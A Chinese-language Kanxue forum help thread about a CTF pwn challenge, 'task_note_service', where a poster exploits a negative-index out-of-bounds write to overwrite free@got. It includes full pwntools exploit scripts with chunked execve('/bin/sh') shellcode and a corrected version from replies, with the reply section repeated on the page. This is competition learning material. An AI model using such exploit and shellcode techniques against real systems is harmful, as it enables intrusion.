[求助] 全国大学信息安全竞赛---task_note_service-Pwn-看雪-安全社区|安全招聘|kanxue.com

[求助] 全国大学信息安全竞赛---task_note_service

2018-5-1 20:26 4002

[求助] 全国大学信息安全竞赛---task_note_service

baolongshou 活跃值

2018-5-1 20:26

4002

全国大学信息安全竞赛----task_note_service

序言

比赛中这道题差那么一点点就做出来了.

程序运行

1.menu

---------menu---------
1. add note
2. show note
3. edit note
4. del note
5. exit
your choice>>

2. add

1. add note
2. show note
3. edit note
4. del note
5. exit
your choice>> 1
index:0
size:100

3. delete

---------menu---------
1. add note
2. show note
3. edit note
4. del note
5. exit
your choice>> 4
index:0

3. 程序分析

幸得gd老哥提醒, 发现这个是一个数组越界的漏洞. add的时候, 程序不会检查index的正负, 这就造成数组向前越界的可能性.实际上也是这么利用的.

思路: 通过数组越界修改 free@got的值为堆的地址. 堆中有我们构造好的shellcode, 程序就会去执行shellcode. 比较坑的是, 每次我们只能输入8 byte的内容. 下面是两种实现方案:

4. 实现方案

方案一:

通过先执行read系统调用, 然后读取x64版本的shellcode, 执行流跳转至该shellcode, 由于本帖是求助帖, exp就不展开讲了, 可以直接使用(Ubuntu 16.04.4 lts)

#!/usr/bin/env python
'''
by gd大佬
'''
from pwn import *
context.log_level = "debug"
elf = "./task_note_service2"
ENV = {"LD_PRELOAD":"./libc.so.6"}
p = process(elf)
#p = remote("49.4.23.66", 31430)
def add(idx, s):
    p.recvuntil("your choice>> ")
    p.sendline("1")
    p.recvuntil("index:")
    p.sendline(str(idx))
    p.recvuntil("size:")
    p.sendline("8")
    p.recvuntil("content:")
    p.send(s)

def delete(idx):
    p.recvuntil("your choice>> ")
    p.sendline("4")
    p.recvuntil("index:")
    p.sendline(str(idx))

add(-0x11, "\x58\x58\x58\x58\x00\x00\x00")
'''
pop rax
pop rax
pop rax
pop rax
add BYTE PTR [rax], al
'''
add(0x11, "\x48\x89\xfe\x48\xc7\xc7\x00")
'''
mov rsi, rdi
mov rdi, 0x0
'''
add(0x11, "\xB8\x00\x00\x00\x00\x0F\x05")
'''
mov eax, 0
syscall
'''

gdb.attach(p)
delete(0x11)

payload = p8(0)*0x7
payload += "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56"
payload += "\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
'''
xor esi, esi
movabs rbx,0x68732f2f6e69622f
push rsi
push rbx
push rsp
push rdi
push 0x3b
pop rax
xor edx, edx
syscall
'''

p.sendline(payload)
p.interactive()

方案二

　思路: 就是利用跳转, 由于只能输入8 byte造成shellcode不能连续, 我就想到了跳转, 每段shellcode结束时, 跳转到下一段shellcode, 跳转位置我们可以通过相对地址来确定. 废了老大的劲儿, 才将shellcode调成每一行最多5 byte

from pwn import *

p = process("./task_note_service2")
#p = remote("117.78.43.127",32059)
context.log_level = 'debug'

def add(index, size, content):
    p.recvuntil("your choice>> ")
    p.sendline("1")
    p.recvuntil("index:")
    p.sendline(str(index))
    p.recvuntil("size:")
    p.sendline(str(size))
    p.recvuntil("content:")

    p.sendline(content)

def delete(index):
    p.recvuntil("your choice>> ")
    p.sendline("4")
    p.recvuntil("index:")
    p.sendline(str(index))

def exit():
    p.recvuntil("your choice>> ")
    p.sendline("5")

offset = 17
add(-17, 8, "\x48\x31\xc0\x50\xeb\x1a") # xor rax, rax push rax
add(0, 8, "\x48\x31\xf6\x53\xeb\x1a") #xor rsi, rsi push rbx
gdb.attach(p)
add(1, 8, "\xbb\x2f\x62\x69\x6e\xeb\x19") #mov rbx, 0x6e69622f
add(2, 8, "\x48\x89\x1c\x24\xeb\x1a") #mov [rsp], rbx
add(3, 8, "\xbb\x2f\x2f\x73\x68\xeb\x19") #mov rbx, 0x68732f2f
add(4, 8, "\x48\x89\x5c\x24\x04\xeb\x19") #mov [rsp+4], rbx
add(5, 8, "\x54\x5f\x5b\x5e\xeb\x1a") #push rsp pop rdi pop rbx pop rsi
add(6, 8, "\xb0\x3b\x0f\x05")     #
delete(2)
#log.info("execve shellcode")
p.interactive()

问题(重点)

问题描述

我这个exp最后也是能执行syscall, 但是显示无参数. 不能getshell.
问: 为什么不能getshell, 对应的寄存器中参数都正确?

有图为证.

有问题的EXP的结果图

无问题的EXP的结果图

提前致谢

还望有能力的大佬, 解答一下我的疑惑, 万分感谢.

阿里云助力开发者！2核2G 3M带宽不限流量！6.18限时价，开发者可享99元/年，续费同价！

最后于 2018-5-1 20:31 被baolongshou编辑，原因：

收藏・0

点赞・0

打赏

最新回复 (8)
myangel 雪币： 1795 活跃值： (63) 能力值： ( LV3，RANK：30 ) 在线值：发帖 7 回帖 356 粉丝 1 关注私信	myangel 2018-5-1 21:08 2 楼 0 看到你我感到自己的大学真心白学了。。。
mratlatsn 雪币： 204 活跃值： (906) 能力值： (RANK：1324 ) 在线值：发帖 33 回帖 164 粉丝 22 关注私信	mratlatsn 10 2018-5-1 22:20 3 楼 0 /bin//sh 是什么意思??? 应该是/bin/sh后边跟个\x00吧。。。
mratlatsn 雪币： 204 活跃值： (906) 能力值： (RANK：1324 ) 在线值：发帖 33 回帖 164 粉丝 22 关注私信	mratlatsn 10 2018-5-1 23:30 4 楼 0 RDX是第三个参数，应该置为NULL（0）才对
holing 雪币： 5676 活跃值： (1303) 能力值： ( LV17，RANK：1185 ) 在线值：发帖 37 回帖 417 粉丝 77 关注私信	holing 15 2018-5-1 23:51 5 楼 0 同意楼上，edx要清0，lz以后遇到这种问题建议去查查linux的syscall的文档，或者搜一个shellcode看看参数跟他的有没有什么不同，其实比来论坛问效率高多了。比方说 https://www.exploit-db.com/exploits/36858/ xorl %edx, %edx syscall 很明显syscall之前把edx清0了最后于 2018-5-1 23:54 被holing编辑，原因：
baolongshou 雪币： 4974 活跃值： (3718) 能力值： ( LV13，RANK：270 ) 在线值：发帖 28 回帖 38 粉丝 29 关注私信	baolongshou 2 2018-5-2 07:10 6 楼 0 thank all
baolongshou 雪币： 4974 活跃值： (3718) 能力值： ( LV13，RANK：270 ) 在线值：发帖 28 回帖 38 粉丝 29 关注私信	baolongshou 2 2018-5-2 07:12 7 楼 0 四楼回复正确, 下面给出第二种方案的正解: from pwn import * p = process("./task_note_service2") #p = remote("117.78.43.127",32059) context.log_level = 'debug' def add(index, size, content): p.recvuntil("your choice>> ") p.sendline("1") p.recvuntil("index:") p.sendline(str(index)) p.recvuntil("size:") p.sendline(str(size)) p.recvuntil("content:") p.sendline(content) def delete(index): p.recvuntil("your choice>> ") p.sendline("4") p.recvuntil("index:") p.sendline(str(index)) def exit(): p.recvuntil("your choice>> ") p.sendline("5") offset = 17 add(-17, 8, "\x48\x31\xc0\x50\xeb\x1a") # xor rax, rax push rax add(0, 8, "\x48\x31\xf6\x53\xeb\x1a") #xor rsi, rsi push rbx add(1, 8, "\xbb\x2f\x62\x69\x6e\xeb\x19") #mov rbx, 0x6e69622f add(2, 8, "\x48\x89\x1c\x24\xeb\x1a") #mov [rsp], rbx add(3, 8, "\xbb\x2f\x73\x68\x00\xeb\x19") #mov rbx, 0x68732f2f add(4, 8, "\x48\x89\x5c\x24\x04\xeb\x19") #mov [rsp+4], rbx add(5, 8, "\x54\x5f\x5b\x5e\xeb\x1a") #push rsp pop rdi pop rbx pop rsi add(6, 8, "\x48\x31\xd2\xb0\x3b\x0f\x05") ''' sc = """ xor rdx,rdx mov al,0x3b syscall """ shellcode = asm(sc,arch = "amd64",os = "linux") add(6, 8, shellcode) # gdb.attach(p) ''' delete(2) #log.info("execve shellcode") p.interactive()
baolongshou 雪币： 4974 活跃值： (3718) 能力值： ( LV13，RANK：270 ) 在线值：发帖 28 回帖 38 粉丝 29 关注私信	baolongshou 2 2018-5-2 07:40 8 楼 0 holing 同意楼上，edx要清0，lz以后遇到这种问题建议去查查linux的syscall的文档，或者搜一个shellcode看看参数跟他的有没有什么不同，其实比来论坛问效率高多了。比方说 [https: ... 多谢, 谨记
pwnda 雪币： 763 活跃值： (288) 能力值： ( LV6，RANK：90 ) 在线值：发帖 3 回帖 24 粉丝 0 关注私信	pwnda 2 2018-5-2 09:31 9 楼 0 唔，这题直接add(1,8,"/bin/sh") 能省好多步骤啊=、=
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

baolongshou

发帖

回帖

270

RANK

关注

私信

他的文章

[原创]C++ static关键字引发的思考

[原创]Windows 之 CRT的检测内存泄露

[讨论] <<程序员的自我修养 -- 链接、装载与库>> 书籍相关问题

[原创] Kamnira Adware分析

关于我们

联系我们

企业服务

看雪公众号

最新回复 (8)
myangel 雪币： 1795 活跃值： (63) 能力值： ( LV3，RANK：30 ) 在线值：发帖 7 回帖 356 粉丝 1 关注私信	myangel 2018-5-1 21:08 2 楼 0 看到你我感到自己的大学真心白学了。。。
mratlatsn 雪币： 204 活跃值： (906) 能力值： (RANK：1324 ) 在线值：发帖 33 回帖 164 粉丝 22 关注私信	mratlatsn 10 2018-5-1 22:20 3 楼 0 /bin//sh 是什么意思??? 应该是/bin/sh后边跟个\x00吧。。。
mratlatsn 雪币： 204 活跃值： (906) 能力值： (RANK：1324 ) 在线值：发帖 33 回帖 164 粉丝 22 关注私信	mratlatsn 10 2018-5-1 23:30 4 楼 0 RDX是第三个参数，应该置为NULL（0）才对
holing 雪币： 5676 活跃值： (1303) 能力值： ( LV17，RANK：1185 ) 在线值：发帖 37 回帖 417 粉丝 77 关注私信	holing 15 2018-5-1 23:51 5 楼 0 同意楼上，edx要清0，lz以后遇到这种问题建议去查查linux的syscall的文档，或者搜一个shellcode看看参数跟他的有没有什么不同，其实比来论坛问效率高多了。比方说 https://www.exploit-db.com/exploits/36858/ xorl %edx, %edx syscall 很明显syscall之前把edx清0了最后于 2018-5-1 23:54 被holing编辑，原因：
baolongshou 雪币： 4974 活跃值： (3718) 能力值： ( LV13，RANK：270 ) 在线值：发帖 28 回帖 38 粉丝 29 关注私信	baolongshou 2 2018-5-2 07:10 6 楼 0 thank all
baolongshou 雪币： 4974 活跃值： (3718) 能力值： ( LV13，RANK：270 ) 在线值：发帖 28 回帖 38 粉丝 29 关注私信	baolongshou 2 2018-5-2 07:12 7 楼 0 四楼回复正确, 下面给出第二种方案的正解: from pwn import * p = process("./task_note_service2") #p = remote("117.78.43.127",32059) context.log_level = 'debug' def add(index, size, content): p.recvuntil("your choice>> ") p.sendline("1") p.recvuntil("index:") p.sendline(str(index)) p.recvuntil("size:") p.sendline(str(size)) p.recvuntil("content:") p.sendline(content) def delete(index): p.recvuntil("your choice>> ") p.sendline("4") p.recvuntil("index:") p.sendline(str(index)) def exit(): p.recvuntil("your choice>> ") p.sendline("5") offset = 17 add(-17, 8, "\x48\x31\xc0\x50\xeb\x1a") # xor rax, rax push rax add(0, 8, "\x48\x31\xf6\x53\xeb\x1a") #xor rsi, rsi push rbx add(1, 8, "\xbb\x2f\x62\x69\x6e\xeb\x19") #mov rbx, 0x6e69622f add(2, 8, "\x48\x89\x1c\x24\xeb\x1a") #mov [rsp], rbx add(3, 8, "\xbb\x2f\x73\x68\x00\xeb\x19") #mov rbx, 0x68732f2f add(4, 8, "\x48\x89\x5c\x24\x04\xeb\x19") #mov [rsp+4], rbx add(5, 8, "\x54\x5f\x5b\x5e\xeb\x1a") #push rsp pop rdi pop rbx pop rsi add(6, 8, "\x48\x31\xd2\xb0\x3b\x0f\x05") ''' sc = """ xor rdx,rdx mov al,0x3b syscall """ shellcode = asm(sc,arch = "amd64",os = "linux") add(6, 8, shellcode) # gdb.attach(p) ''' delete(2) #log.info("execve shellcode") p.interactive()
baolongshou 雪币： 4974 活跃值： (3718) 能力值： ( LV13，RANK：270 ) 在线值：发帖 28 回帖 38 粉丝 29 关注私信	baolongshou 2 2018-5-2 07:40 8 楼 0 holing 同意楼上，edx要清0，lz以后遇到这种问题建议去查查linux的syscall的文档，或者搜一个shellcode看看参数跟他的有没有什么不同，其实比来论坛问效率高多了。比方说 [https: ... 多谢, 谨记
pwnda 雪币： 763 活跃值： (288) 能力值： ( LV6，RANK：90 ) 在线值：发帖 3 回帖 24 粉丝 0 关注私信	pwnda 2 2018-5-2 09:31 9 楼 0 唔，这题直接add(1,8,"/bin/sh") 能省好多步骤啊=、=
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复